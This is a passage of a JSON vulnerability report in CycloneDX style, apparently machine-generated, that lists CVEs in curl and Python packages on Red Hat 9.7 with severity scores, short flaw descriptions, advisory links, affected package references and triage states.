"affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-15079", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 8.1, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 297 ], "description": "When doing SSH-based transfers using either SCP or SFTP, and setting the\nknown_hosts file, libcurl could still mistakenly accept connecting to hosts\n*not present* in the specified file if they were added as recognized in the\nlibssh *global* known_hosts file.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-15079" }, { "url": "http://www.openwall.com/lists/oss-security/2026/01/07/6" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-15079" }, { "url": "https://curl.se/docs/CVE-2025-15079.html" }, { "url": "https://curl.se/docs/CVE-2025-15079.json" }, { "url": "https://github.com/advisories/GHSA-7q9p-cx8r-rh2q" }, { "url": "https://hackerone.com/reports/3477116" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15079" }, { "url": "https://ubuntu.com/security/notices/USN-8062-1" }, { "url": "https://ubuntu.com/security/notices/USN-8062-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-15079" } ], "published": "2026-01-08T10:15:47+00:00", "updated": "2026-01-20T14:50:24+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2025-15224", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 3.1, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "source": { "name": "photon" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 4.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 287 ], "description": "When doing SSH-based transfers using either SCP or SFTP, and asked to do\npublic key authentication, curl would wrongly still ask and authenticate using\na locally running SSH agent.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-15224" }, { "url": "http://www.openwall.com/lists/oss-security/2026/01/07/7" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-15224" }, { "url": "https://curl.se/docs/CVE-2025-15224.html" }, { "url": "https://curl.se/docs/CVE-2025-15224.json" }, { "url": "https://github.com/advisories/GHSA-hccr-q52r-4w88" }, { "url": "https://hackerone.com/reports/3480925" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15224" }, { "url": "https://ubuntu.com/security/notices/USN-8062-1" }, { "url": "https://ubuntu.com/security/notices/USN-8062-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-15224" } ], "published": "2026-01-08T10:15:47+00:00", "updated": "2026-01-20T14:47:52+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-15282", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 4.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 93 ], "description": "User-controlled data URLs parsed by urllib.request.DataHandler allow injecting headers through newlines in the data URL mediatype.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-15282" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10950" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-15282" }, { "url": "https://bugzilla.redhat.com/2395108" }, { "url": "https://bugzilla.redhat.com/2408891" }, { "url": "https://bugzilla.redhat.com/2418084" }, { "url": "https://bugzilla.redhat.com/2431366" }, { "url": "https://bugzilla.redhat.com/2431374" }, { "url": "https://bugzilla.redhat.com/2444691" }, { "url": "https://bugzilla.redhat.com/2448168" }, { "url": "https://bugzilla.redhat.com/2448181" }, { "url": "https://bugzilla.redhat.com/2457409" }, { "url": "https://bugzilla.redhat.com/2457932" }, { "url": "https://bugzilla.redhat.com/2458049" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100" }, { "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:10950" }, { "url": "https://github.com/python/cpython/commit/05356b1cc153108aaf27f3b72ce438af4aa218c0" }, { "url": "https://github.com/python/cpython/commit/34d76b00dabde81a793bd06dd8ecb057838c4b38" }, { "url": "https://github.com/python/cpython/commit/3f396ca9d7bbe2a50ea6b8c9b27c0082884d9f80" }, { "url": "https://github.com/python/cpython/commit/4ed11d3cd288e6b90196a15c5a825a45d318fe47" }, { "url": "https://github.com/python/cpython/commit/a35ca3be5842505dab74dc0b90b89cde0405017a" }, { "url": "https://github.com/python/cpython/commit/f25509e78e8be6ea73c811ac2b8c928c28841b9f" }, { "url": "https://github.com/python/cpython/issues/143925" }, { "url": "https://github.com/python/cpython/pull/143926" }, { "url": "https://linux.oracle.com/cve/CVE-2025-15282.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/X66HL7SISGJT33J53OHXMZT4DFLMHVKF/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15282" }, { "url": "https://ubuntu.com/security/notices/USN-8018-1" }, { "url": "https://ubuntu.com/security/notices/USN-8018-3" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-15282" } ], "published": "2026-01-20T22:15:50+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": 